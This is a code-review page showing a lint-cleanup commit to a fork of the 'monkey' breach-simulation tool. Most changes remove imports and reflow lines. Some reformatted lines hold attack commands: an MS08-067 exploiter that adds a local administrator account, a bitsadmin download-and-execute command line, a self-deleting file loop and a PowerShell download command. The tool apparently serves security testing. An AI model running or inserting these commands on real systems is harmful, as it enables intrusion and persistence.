p34709852
/
monkey
forked from p15670423/monkey
1
0
Fork 1
Code Issues Pull Requests Projects Releases Wiki Activity

Merge pull request #636 from acepace/bugfix/random_pep 

Bugfix/random pep
Thanks to @acepace
This commit is contained in:
Shay Nehmad 2020-05-06 12:38:09 +03:00 committed by GitHub
parent f3ec436f78 115cb05031
commit d5021540ca
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
30 changed files with 24 additions and 49 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.travis.yml
View File

@ -36,7 +36,7 @@ script:
## Display the linter issues
- cat flake8_warnings.txt
## Make sure that we haven't increased the amount of warnings.
- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=190
- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=120
- if [ $(tail -n 1 flake8_warnings.txt) -gt $PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many python linter warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi
## Run unit tests

1
envs/monkey_zoo/blackbox/island_client/monkey_island_client.py
View File

@ -1,4 +1,3 @@
from datetime import timedelta
from time import sleep
import json

1
envs/monkey_zoo/blackbox/test_blackbox.py
View File

@ -144,4 +144,3 @@ class TestMonkeyBlackbox(object):
island_client,
"PERFORMANCE.conf",
timeout_in_seconds=10*60)

3
envs/os_compatibility/test_compatibility.py
View File

@ -57,6 +57,3 @@ class TestOSCompatibility(object):
if len(ips_that_communicated) < len(machine_list):
assert False

1
monkey/infection_monkey/exploit/weblogic.py
View File

@ -4,7 +4,6 @@ import time
import copy
from requests import post, exceptions
from http.server import BaseHTTPRequestHandler, HTTPServer
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.exploit.HostExploiter import HostExploiter

6
monkey/infection_monkey/exploit/win_ms08_067.py
View File

@ -193,9 +193,9 @@ class Ms08_067_Exploiter(HostExploiter):
sock.send("cmd /c (net user {} {} /add) &&"
" (net localgroup administrators {} /add)\r\n".format(
self._config.user_to_add,
self._config.remote_user_pass,
self._config.user_to_add).encode())
self._config.user_to_add,
self._config.remote_user_pass,
self._config.user_to_add).encode())
time.sleep(2)
reply = sock.recv(1000)

8
monkey/infection_monkey/model/__init__.py
View File

@ -14,10 +14,10 @@ MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG,)
GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)'
DROPPER_CMDLINE_DETACHED_WINDOWS = '%s start cmd /c %%(dropper_path)s %s' % (CMD_PREFIX, DROPPER_ARG,)
MONKEY_CMDLINE_DETACHED_WINDOWS = '%s start cmd /c %%(monkey_path)s %s' % (CMD_PREFIX, MONKEY_ARG,)
MONKEY_CMDLINE_HTTP = '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd ' \
'/c %%(monkey_path)s %s"' % (CMD_PREFIX, MONKEY_ARG,)
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(' \
'file_path)s exit)) > NUL 2>&1 '
MONKEY_CMDLINE_HTTP = '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s' \
'&cmd /c %%(monkey_path)s %s"' % (CMD_PREFIX, MONKEY_ARG,)
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & ' \
'if not exist %(file_path)s exit)) > NUL 2>&1 '
# Commands used for downloading monkeys
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(" \

3
monkey/infection_monkey/network/info.py
View File

@ -51,18 +51,15 @@ if is_windows_os():
local_hostname = socket.gethostname()
return socket.gethostbyname_ex(local_hostname)[2]
def get_routes():
raise NotImplementedError()
else:
from fcntl import ioctl
def local_ips():
valid_ips = [network['addr'] for network in get_host_subnets()]
return valid_ips
def get_routes(): # based on scapy implementation for route parsing
try:
f = open("/proc/net/route", "r")

1
monkey/infection_monkey/network/ping_scanner.py
View File

@ -7,7 +7,6 @@ import sys
import infection_monkey.config
from infection_monkey.network.HostFinger import HostFinger
from infection_monkey.network.HostScanner import HostScanner
from infection_monkey.model.host import VictimHost
__author__ = 'itamar'

1
monkey/infection_monkey/system_info/__init__.py
View File

@ -1,5 +1,4 @@
import logging
import socket
import sys
import psutil

2
monkey/infection_monkey/transport/__init__.py
View File

@ -1,3 +1 @@
from infection_monkey.transport.http import HTTPServer, LockedHTTPServer
__author__ = 'hoffer'

1
monkey/infection_monkey/utils/windows/users.py
View File

@ -73,7 +73,6 @@ class AutoNewWindowsUser(AutoNewUser):
def run_as(self, command):
# Importing these only on windows, as they won't exist on linux.
import win32con
import win32process
import win32api
import win32event

1
monkey/monkey_island/cc/bootloader_server.py
View File

@ -46,4 +46,3 @@ class BootloaderHTTPRequestHandler(BaseHTTPRequestHandler):
@staticmethod
def get_bootloader_resource_url(server_ip):
return "https://" + server_ip + ":" + str(Environment._ISLAND_PORT) + "/api/bootloader/"

5
monkey/monkey_island/cc/environment/test_aws.py
View File

@ -9,7 +9,8 @@ class TestAwsEnvironment(IslandTestCase):
def test_get_auth_users(self):
env = AwsEnvironment()
# This is "injecting" the instance id to the env. This is the UTs aren't always executed on the same AWS machine
# (might not be an AWS machine at all). Perhaps it would have been more elegant to create a Mock, but not worth it for
# (might not be an AWS machine at all).
# Perhaps it would have been more elegant to create a Mock, but not worth it for
# this small test.
env._instance_id = "i-666"
hash_obj = hashlib.sha3_512()
@ -22,5 +23,3 @@ class TestAwsEnvironment(IslandTestCase):
assert auth_user.id == 1
assert auth_user.username == "monkey"
assert auth_user.secret == hash_obj.hexdigest()

12
monkey/monkey_island/cc/models/__init__.py
View File

@ -12,9 +12,9 @@ else:
connect(db=env.mongo_db_name, host=env.mongo_db_host, port=env.mongo_db_port)
# Order of importing matters here, for registering the embedded and referenced documents before using them.
from .config import Config
from .creds import Creds
from .monkey_ttl import MonkeyTtl
from .pba_results import PbaResults
from .command_control_channel import CommandControlChannel
from .monkey import Monkey
from .config import Config # noqa: F401
from .creds import Creds # noqa: F401
from .monkey_ttl import MonkeyTtl # noqa: F401
from .pba_results import PbaResults # noqa: F401
from .command_control_channel import CommandControlChannel # noqa: F401
from .monkey import Monkey # noqa: F401

1
monkey/monkey_island/cc/models/attack/mitigation.py
View File

@ -16,4 +16,3 @@ class Mitigation(EmbeddedDocument):
description = mitigation['description']
url = MitreApiInterface.get_stix2_external_reference_url(mitigation)
return Mitigation(name=name, description=description, url=url)

4
monkey/monkey_island/cc/models/test_monkey.py
View File

@ -13,8 +13,8 @@ logger = logging.getLogger(__name__)
class TestMonkey(IslandTestCase):
"""
Make sure to set server environment to `testing` in server_config.json! Otherwise this will mess up your mongo instance and
won't work.
Make sure to set server environment to `testing` in server_config.json!
Otherwise this will mess up your mongo instance and won't work.
Also, the working directory needs to be the working directory from which you usually run the island so the
server_config.json file is found and loaded.

3
monkey/monkey_island/cc/models/zero_trust/test_finding.py
View File

@ -33,7 +33,8 @@ class TestFinding(IslandTestCase):
event_example = Event.create_event(
title="Event Title", message="event message", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK)
Finding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED, events=[event_example])
Finding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION,
status=zero_trust_consts.STATUS_FAILED, events=[event_example])
self.assertEqual(len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), 1)
self.assertEqual(len(Finding.objects(status=zero_trust_consts.STATUS_FAILED)), 1)

1
monkey/monkey_island/cc/resources/bootloader_test.py
View File

@ -1,7 +1,6 @@
from unittest import TestCase
from monkey_island.cc.resources.bootloader import Bootloader
from monkey_island.cc.services.utils.bootloader_config import SUPPORTED_WINDOWS_VERSIONS
class TestBootloader(TestCase):

1
monkey/monkey_island/cc/resources/node_states.py
View File

@ -1,4 +1,3 @@
from flask import request
import flask_restful
from monkey_island.cc.auth import jwt_required

4
monkey/monkey_island/cc/services/attack/attack_config.py
View File

@ -120,7 +120,7 @@ class AttackConfig(object):
def set_bool_conf_val(path, val, monkey_config):
"""
Changes monkey's configuration by setting one of its boolean fields value
:param path: Path to boolean value in monkey's configuration. E.g. ['monkey', 'system_info', 'should_use_mimikatz']
:param path: Path to boolean value in monkey's configuration. ['monkey', 'system_info', 'should_use_mimikatz']
:param val: Boolean
:param monkey_config: Monkey's configuration
"""
@ -183,5 +183,5 @@ class AttackConfig(object):
techniques = {}
for type_name, attack_type in list(attack_config.items()):
for key, technique in list(attack_type['properties'].items()):
techniques[key] = {'selected': technique['value'], 'type': SCHEMA['properties'][type_name]['title']}
techniques[key] = {'selected': technique['value'], 'type': SCHEMA['properties'][type_name]['title']}
return techniques

1
monkey/monkey_island/cc/services/attack/technique_reports/T1136.py
View File

@ -2,7 +2,6 @@ from monkey_island.cc.services.attack.technique_reports import AttackTechnique
from monkey_island.cc.services.reporting.report import ReportService
from common.utils.attack_utils import ScanStatus
from common.data.post_breach_consts import POST_BREACH_BACKDOOR_USER, POST_BREACH_COMMUNICATE_AS_NEW_USER
from monkey_island.cc.models import Monkey
__author__ = "shreyamalviya"

1
monkey/monkey_island/cc/services/attack/technique_reports/__init__.py
View File

@ -129,4 +129,3 @@ class AttackTechnique(object, metaclass=abc.ABCMeta):
return {'mitigations': mitigation_document.to_mongo().to_dict()['mitigations']}
else:
return {}

1
monkey/monkey_island/cc/services/bootloader_test.py
View File

@ -32,4 +32,3 @@ class TestBootloaderService(TestCase):
ips = ["127.1.1.1", "127.0.0.1", "192.168.56.1"]
ips = BootloaderService.remove_local_ips(ips)
self.assertEqual(["192.168.56.1"], ips)

2
monkey/monkey_island/cc/services/config_schema.py
View File

@ -130,7 +130,7 @@ SCHEMA = {
"title": "Collect the machine's hostname",
"attack_techniques": []
},
{
{
"type": "string",
"enum": [
PROCESS_LIST_COLLECTOR

1
monkey/monkey_island/cc/services/node.py
View File

@ -411,5 +411,6 @@ class NodeService:
def get_hostname_by_id(node_id):
return NodeService.get_node_hostname(mongo.db.monkey.find_one({'_id': node_id}, {'hostname': 1}))
class NodeCreationException(Exception):
pass

1
monkey/monkey_island/cc/services/telemetry/processing/system_info.py
View File

@ -101,4 +101,3 @@ def process_mimikatz_and_wmi_info(telemetry_json):
monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid']).get('_id')
wmi_handler = WMIHandler(monkey_id, telemetry_json['data']['wmi'], users_secrets)
wmi_handler.process_and_handle_wmi_info()

1
monkey/monkey_island/cc/services/utils/bootloader_config.py
View File

@ -9,4 +9,3 @@ SUPPORTED_WINDOWS_VERSIONS = {
"windows7_sp1": True,
"windows8_or_greater": True,
}

2
monkey/monkey_island/cc/services/utils/node_states_test.py
View File

@ -11,5 +11,3 @@ class TestNodeGroups(TestCase):
self.assertEqual(NodeStates.get_by_keywords(['monkey', 'linux', 'running']), NodeStates.MONKEY_LINUX_RUNNING)
with self.assertRaises(NoGroupsFoundException):
NodeStates.get_by_keywords(['bogus', 'values', 'from', 'long', 'list', 'should', 'fail'])

1
monkey/monkey_island/cc/utils.py
View File

@ -20,7 +20,6 @@ if sys.platform == "win32":
else:
import fcntl
def local_ips():
result = []
try: